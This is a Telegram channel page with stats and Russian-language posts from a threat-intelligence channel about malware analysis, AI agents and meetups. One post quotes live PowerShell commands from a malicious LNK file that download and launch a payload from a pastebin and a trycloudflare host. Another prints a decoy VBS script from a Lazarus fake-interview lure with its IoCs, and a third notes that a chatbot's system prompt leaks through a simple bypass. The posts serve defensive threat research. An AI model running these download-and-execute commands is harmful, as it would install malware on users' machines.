Secure Lemur
رفتن به کانال در Telegram
Threat Intelligence,Threat Hunting, Информационная безопасность и прочее полезное. Все исключительно в познавательных целях. Daily scam alerts ⚠️: @tinyscope Чат для обсуждений: @threat_chat
نمایش بیشتر2 504
مشترکین
-224 ساعت
+27 روز
+3630 روز
در حال بارگیری داده...
کانالهای مشابه
ابر برچسبها
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
اوت '26
اوت '26
+82
در 1 کانالها
ژوئیه '26
+88
در 0 کانالها
Get PRO
ژوئن '26
+95
در 0 کانالها
Get PRO
مه '26
+76
در 0 کانالها
Get PRO
آوریل '26
+66
در 0 کانالها
Get PRO
مارس '26
+124
در 0 کانالها
Get PRO
فوریه '26
+102
در 0 کانالها
Get PRO
ژانویه '26
+112
در 0 کانالها
Get PRO
دسامبر '25
+116
در 4 کانالها
Get PRO
نوامبر '25
+99
در 0 کانالها
Get PRO
اکتبر '25
+79
در 1 کانالها
Get PRO
سپتامبر '25
+90
در 0 کانالها
Get PRO
اوت '25
+129
در 1 کانالها
Get PRO
ژوئیه '25
+133
در 1 کانالها
Get PRO
ژوئن '25
+85
در 0 کانالها
Get PRO
مه '25
+101
در 3 کانالها
Get PRO
آوریل '25
+88
در 0 کانالها
Get PRO
مارس '25
+102
در 1 کانالها
Get PRO
فوریه '25
+83
در 0 کانالها
Get PRO
ژانویه '25
+111
در 0 کانالها
Get PRO
دسامبر '24
+166
در 1 کانالها
Get PRO
نوامبر '24
+264
در 0 کانالها
Get PRO
اکتبر '24
+92
در 1 کانالها
Get PRO
سپتامبر '24
+99
در 3 کانالها
Get PRO
اوت '24
+94
در 3 کانالها
Get PRO
ژوئیه '24
+77
در 1 کانالها
Get PRO
ژوئن '24
+89
در 1 کانالها
Get PRO
مه '24
+79
در 2 کانالها
Get PRO
آوریل '24
+116
در 0 کانالها
Get PRO
مارس '24
+92
در 0 کانالها
Get PRO
فوریه '24
+98
در 1 کانالها
Get PRO
ژانویه '24
+108
در 2 کانالها
Get PRO
دسامبر '23
+286
در 2 کانالها
Get PRO
نوامبر '230
در 0 کانالها
Get PRO
اکتبر '230
در 0 کانالها
Get PRO
سپتامبر '23
+673
در 0 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 28 اوت | 0 | |||
| 27 اوت | +2 | |||
| 26 اوت | +1 | |||
| 25 اوت | 0 | |||
| 24 اوت | +4 | |||
| 23 اوت | +6 | |||
| 22 اوت | 0 | |||
| 21 اوت | +4 | |||
| 20 اوت | +6 | |||
| 19 اوت | +2 | |||
| 18 اوت | +1 | |||
| 17 اوت | +2 | |||
| 16 اوت | +3 | |||
| 15 اوت | +4 | |||
| 14 اوت | +3 | |||
| 13 اوت | +6 | |||
| 12 اوت | 0 | |||
| 11 اوت | +1 | |||
| 10 اوت | +5 | |||
| 09 اوت | +1 | |||
| 08 اوت | +2 | |||
| 07 اوت | +7 | |||
| 06 اوت | +4 | |||
| 05 اوت | +3 | |||
| 04 اوت | +1 | |||
| 03 اوت | +3 | |||
| 02 اوت | +4 | |||
| 01 اوت | +7 |
پستهای کانال
| 2 | Напоминаю про лайфхак с ученической почтой ✍🏼 | 562 |
| 3 | Shodan снова раздает пожизненный membership за 5$. Еще успеваешь 📈
❤@seclemur |❤ @threat_chat | 634 |
| 4 | Как говорится - любой уважающий себя AI-TI энтузиаст начинает парсить новости и статьи.
Вот и я поигрался с промптами и Hermes и карманную TI платформу в Obsidian. Скормил ему побольше разных TI блогов вендоров, описал что и в каком формате хочу получать: так чтобы между страницами хранилища obsidian была перелинковка сущностей в случае если они связаны. С таким же успехом можно просить его делать другие аутпуты, например, STIX и грузить в нужные системы (OpenCTI).
Промежуточный итог на видео. Особой практической пользы для меня в этом нет, но поиграться было интересно.
Затраты:
1 час времени
15$ на написание скиллов + ~10$ на сам парсинг текста
и оставил где-то на 10 дней собирать из RSS репорты какие сможет отловить.
Модели:
deepseek-v4-pro для общения с агентом и написания скиллов
deepseek-v4-flash для обработки текста статей (подешевле чтоб было)
❤@seclemur |❤ @threat_chat | 377 |
| 5 | Пссс, тут вакансия открыта:
https://hh.ru/vacancy/133732099
Поиск Threat Intelligence аналитика с большим желанием искать и изучать новые киберугрозы. Важен опыт именно изучения и поиск чего-то нового и неизвестного. Различные пет-проекты для превентивного хантинга сэмплов, сетевой инфраструктуры приветствуется и в почете - если таковой опыт имеется обязательно упомяни в сопроводительном письме. Если ты младший, но считаешь что можешь удивить, то тоже не стесняйся откликаться. | 692 |
| 6 | Пока промежуточный итоги такие:
1) AI агенты как таковые - это топ, концепция очень нравится.
2) OpenClaw невозможно лагающее создание. Админить его тяжело, пришлось сносить
3) Спасибо @poxek за рекомендацию в чате. Поставил hermes - работает на порядки стабильнее. Но, наверное, следующий этап это написание своего агента.
продолжаю тестировать, докручиваем с агентом скиллы, надеюсь получится кое-что интересное.
❤@seclemur |❤ @threat_chat | 391 |
| 7 | Я буду, приходите тоже :) | 522 |
| 8 | Всем привет 👋.
Инсека и Технологии киберугроз приглашают вас на CTI meetup #5.
🍻 обсуждаем рабочие моменты, делимся опытом
📆 23 мая, 14:00-20:00
📍 Место: Лофт «Москва» по адресу Москва, Берсеневская набережная, 6с3
Программа CTI meetup #5:
Сбор гостей 13:30-14:00
Начало выступлений 14:00
1. Threat Hunting в опенсорсе: злоумышленники используют ИИ, мы тоже, но есть нюанс
Раковский Станислав (руководитель группы Supply Chain Security в Positive Technologies)
2. Хватит «приручать фиды»: что реально работает в телекоме
Елютин Павел (руководитель направления анализа киберугроз, Билайн)
Снежков Александр (эксперт по анализу киберугроз, Билайн)
3. Докладчик уточняется
🍻 Кофе-брейк 15:30-16:00
4. Практический CTI 2.0: добро пожаловать в Cyberpunk. Ну почти.
Мешков Андрей (независимый эксперт)
5. Квиз
✌️17:00-20:00 С вас общение, с нас пиво.
Мы рады будем видеть всех желающих, но к сожалению, количество мест ограничено размерами помещения.
👉🏼 Зарегистрироваться | 475 |
| 9 | Сделал скилл который по плану будет детектить малварные C2 на потоке. Если будет адекватно работать, то сделаю отдельный канальчик с фидами как раньше было в @tinyscope.
Обзаведусь недостающими ключами к search engines и поставлю на поток. Сейчас решил добавить Shodan, FOFA, Zoomeye, Netlas. Какие еще предложения ?
+ может кто поделится готовыми рулями к таким поисковикам, буду рад перенять вашу опыт и мудрость.
Из полезного знаю такие ресурсы - ссылка1 ссылка2 | 446 |
| 10 | Следом другая статья, но тоже про агентов и безопасность. Это исследование про беспрерывную деанонимизацию пользователей с помощью LLM. То, что раньше требовало часов ручной работы OSINT-аналитика, теперь можно автоматизировать и поставить на поток😐
Ресерчеры рассказывают как они с помощью агентов и инструментов для них построили целый пайплайн по деанону пользователей:
1️⃣ Extract – из постов в социальных сетях пользователя модель вытаскивает сырые факты: город, работа, образование, хобби, события.
2️⃣ Search – LLM генерирует поисковые запросы на основе собранных данных и ищет похожих кандидатов в интернете.
3️⃣ Reason – сопоставляет найденные профили с извлечёнными фактами семантически.
4️⃣ Calibrate – оценивает уверенность и отбрасывает слабые совпадения.
LLM одновременно анализирует, ищет и сопоставляет информацию. Это позволяет автоматизировать деанонимизацию и работать в масштабе, что раньше делал только человек. Как-будто бы анонимность закончилась на некоторое время. Теперь если ты хочешь быть анонимным в интернете придется делать poisoning своих данных и использовать прочие уязвимости/слабости чтобы испортить LLM работу.
❤@seclemur |❤ @threat_chat | 508 |
| 11 | Теперь вы будете встречать меня на VT чаще. Я теперь нейрослоп 💃
А я всего лишь попросил его научиться отправлять комменты к индикаторам на VT, если в статье он находит какие-то IoC. | 423 |
| 12 | Наконец приступил к тестированию нашумевшего OpenClaw. С горем пополам,но развернул у себя его на домашней машине для тестов 😂 Сходу испытал детский восторг - штука невероятно адаптивная и очень гибкая. Выше скриншоты буквально сразу после первоначальной настройки. А сколько еще всего впереди.
Безусловно прежде чем запускать его проштудировал кучу постов в твиттере на тему того как он все удаляет и ломает. Морально к этому готов🤩
Основная гипотеза для проверки - можно ли с околонулевыми знанями в AI агентах сделать из него полноценного TI-аналитика-помощника, способного анализировать отчеты и делать расследования на потоке. А можем в ходе изучения появятся дополнительные мысли.
На старте план такой:
Скинул в него IoC -> он пробежался по всем источникам что у него есть и собрал отчет по нему, а также дал какие-то рекомендации.
Спойлер - научить его этому дело 5 минут. И ноль строчек кода самостоятельно написанных.
Интересна ли эта тема, нужно ли освещать ее чаще?
В целом, если были какие-то интересные идеи как использовать агента, но у тебя не доходили руки разобраться/протеститровать, то можно писать их в комменты, а я попробую это реализовать 👇
❤@seclemur |❤ @threat_chat | 447 |
| 13 | Не совсем тематика этого канала, но тоже важно подстветить.
В прошлый раз затронулась тема про то как разгрузить голову. В этот раз я тоже не с пустыми руками.
Нашел исследование которое точно объясняет, почему рабочий день часто ощущается как «работал, но ничего не сделал». Суть статьи в том что продуктивность зависит не от силы воли, а от трёх вещей: как часто тебя отвлекают, сколько времени уходит на возвращение в задачу и какой минимальный непрерывный отрезок нужен, чтобы вообще получить результат.
Каждый раз, когда отвлекаешься (например, проверка соцсетей или ответ на сообщение в чате), мозгу нужно время, чтобы вернуться в рабочий ритм. Исследования автора показывают, что на восстановление фокуса может уходить до 23 минут.
С помощью математических формул автор посчитал, каковы шансы в 100 рабочих днях найти три цельных 60-минутных отрезка:
• если отвлекаться 1 раз в час — 70%,
• если прерываться 2 раза в час, вероятность сокращается в 5 раз.
Самый забавный вывод - при частых прерываниях (например, каждые 3–5 минут) глубокая работа становится математически почти невозможной (!). А теперь вспомни как часто сыпятся уведомления или когда случайно открываешь телеграм и видишь непрочитанный пост в канале что не читал уже два года.
Замьютил несколько месяцев назад все чаты и приложения - стал более концентрированным и спокойным😋
Нет у тебя модного СДВГ, это просто обстоятельства в которых мы все живем.
Исследование
Другая полезная статья на русском
❤@seclemur |❤ @threat_chat | 496 |
| 14 | Иногда приходится и такие атаки изучать (видео 👆😁)
LNK файл с командой, которая качала видео пару недель назад:
-c "$b=(irm https://pastes.io/raw/aaaaigz0ex);[IO.File]::WriteAllBytes(\"$env:TEMP\v.mp4\",[Convert]::FromBase64String($b));start $env:TEMP\v.mp4"
Но забавно что сейчас на этом пастбине висит другой скрипт:
if (!(Test-Path "$env:LOCALAPPDATA\Discord\*\Discord.exe") -and !(Get-PSDrive -PSProvider FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "Discord.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 })) { exit }
Invoke-WebRequest -OutFile $env:AppData\RuntimeBroker.exe -Uri https://enjoyed-hop-definitions-tee.trycloudflare.com/64.exe
start $env:AppData\RuntimeBroker.exe
Интересно что это за аудитория, которую таргетят путем поиска дискорда на машине. Вероятно та же аудитория, что и писала этот скрипт😂 Пейлоад, увы, уже не доступен.
VirusTotal
❤@seclemur |❤ @threat_chat | 504 |
| 15 | Ультимативный гайд по организации инфраструктуры для пентестов - тык
Много интересных мыслей есть и для исследователей угроз. Но глава о CDN Relays особенно понравилась. Недавно натыкался на несколько примеров реальных атак, где злоумышленники использовали инфраструктуру Microsoft Azure в качестве командного центра. Главного загвоздка этой техники заключается в том, что домены от облачных сервисов микромягких чаще всего от греха подальше в вайтлистах и теряются в огромном потоке телеметрии, которую отправляет Windows на свои сервера. Попробуйте запустить машину хотя бы в том же самом Any.Run и посмотрите на количество улетевших данных просто потому что система запустилась😂 Тем самым всего за пару баксов аренды пэнтестеры прячут свое сетевое взаимодействие в легитимном трафике.
Ниже список доменов облачных сервисов Azure, за трафиком в сторону которых стоит присматривать бдительнее:
*.accesscontrol.windows.net
*.graph.windows.net
*.onmicrosoft.com
*.azure-api.net
*.biztalk.windows.net
*.blob.core.windows.net
*.cloudapp.net
*.cloudapp.azure.com
*.azurecr.io
*.azurecontainer.io
*.vo.msecnd.net
*.cosmos.azure.com
*.documents.azure.com
*.file.core.windows.net
*.azurefd.net
*.vault.azure.net
*.azmk8s.io
*.management.core.windows.net
*.origin.mediaservices.windows.net
*.azure-mobile.net
*.queue.core.windows.net
*.servicebus.windows.net
*.database.windows.net
*.azureedge.net
*.table.core.windows.net
*.trafficmanager.net
*.azurewebsites.net
*.visualstudio.com
❤@seclemur |❤ @threat_chat | 701 |
| 16 | Попалась очередная атака от Lazarus.
Сайт для прохождения собеседований. В данном случае на позицию маркетолога. После прохождения опроса из нескольких задач для успешного видеозвонка просит обновить драйвера, открыв командную строку и вставив нужную команду. Все бы ничего, да только в буфер обмена приходит немного расширенная команда, скачивающая полезную нагрузку
😂 Забавный момент:
для симуляции установки драйверов запускается vbs скрипт с таким содержанием:
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
objShell.Run "cmd /c title NVIDIA Display Driver Update Utility", 0, False
objShell.Run "cmd /c color 0A", 0, False
objShell.Run "cmd /c cls", 0, False
WScript.Echo ""
WScript.Echo "================================================"
WScript.Echo " NVIDIA Display Driver Update Utility"
WScript.Echo "================================================"
WScript.Echo ""
WScript.Echo "[INFO] Scanning for compatible hardware..."
WScript.Sleep 333
WScript.Echo "[INFO] Detected: NVIDIA GeForce Graphics Adapter"
WScript.Sleep 1167
WScript.Echo "[INFO] Current driver version: 536.99"
WScript.Sleep 500
WScript.Echo "[INFO] Available driver version: 581.80 (WHQL)"
WScript.Echo ""
WScript.Sleep 400
WScript.Echo "[STEP 1/5] Preparing driver installation..."
WScript.Sleep 2330
WScript.Echo " Status: Checking system compatibility"
Call AnimateDots(3, 50, 150)
WScript.Echo " OK"
WScript.Sleep 667
WScript.Echo " Status: Verifying disk space"
Call AnimateDots(3, 80, 200)
WScript.Echo " OK (2.1 GB required)"
WScript.Sleep 167
WScript.Echo " Status: Creating system restore point"
Call AnimateDots(4, 50, 150)
WScript.Echo " OK"
WScript.Sleep 67
WScript.Echo " Status: Preparation completed"
WScript.Echo ""
WScript.Sleep 67
Почитать про подобные киллчейны от этой группировки и их деанон можно тут - ссылка
IOCs:
breezyhr[.us
api.bitken[.cloud
93.127.215[.188
187.77.220[.50
❤@tinyscope | ❤@seclemur |❤ @threat_chat | 616 |
| 17 | Системный промпт он тоже отдает без проблем 😁
оставил в комментариях посмотреть 👇🏼 | 460 |
| 18 | У OpenAI появился ИИ-переводчик - https://chatgpt.com/translate/.
Пока что ломается от любого простого обхода системного промпта 😁
Как думаете, намеренно?
❤@tinyscope | ❤@seclemur |❤ @threat_chat | 459 |
| 19 | Размышлений пост
2025 для меня, как думаю и для многих , стал годом интеграции различных форматом ИИшек в жизнь и рабочие процессы.
За предыдущий год я перепробовал ИИ для кучи разных задач - искал информацию, делал отчеты, автоматизировал работу, просил дать лучший рецепт говяжьих крылышек. Но самым ломающим все мои шаблоны оказался вайб-кодинг.
Всего за 20 баксов ты получаешь себе инструмент, который позволяет реализовать тебе прототип любой идеи буквально за день. Реально любой идеи. Все что тебе нужно для этого - продолжать структурировать свои мысли и последовательно просить его делать то что тебе нужно. На выходе у тебя неидеальный, непродовый, но работающий продукт, который позволит тебе протестировать твою гипотезу или идею.
За 2025 год я сделал много разных пет проектов с помощью ИИ. Например, создал полностью фронтенд, не написав не единой строчки кода на JS. И это работало.
Есть и минусы. Не говорю о том что все надо перепроверять, галлюцинации и прочее, это всем уже ясно. Я заметил вот что - МЛные инструменты позволяют решать гораздо больше задач в единицу времени. Но как следствие это влечет за собой не сокращение труда и отдых на пляже, а наоборот увеличение количества задач, которые приходится решать. Такой вот парадокс. Хорошо это или плохо увидим в будущем.
Это я все к чему. Если в 2026 вы не планируете использовать ИИ в своей работе, то будете человеком, кто пашет поле с помощью плуга и лошади, когда соседи уже используют трактор.
❤@tinyscope | ❤@seclemur |❤ @threat_chat | 473 |
| 20 | Наткнулся на статью как оптимизировать свои дела и разгрузить голову.
Главный посыл - в голове есть оперативная память и ее нужно переодически чистить, чтобы было место для обработки новой информации. Вроде бы очевидные вещи, но работают очень эффективно.
https://habr.com/ru/articles/972958/
❤@tinyscope | ❤@seclemur |❤ @threat_chat | 4 056 |
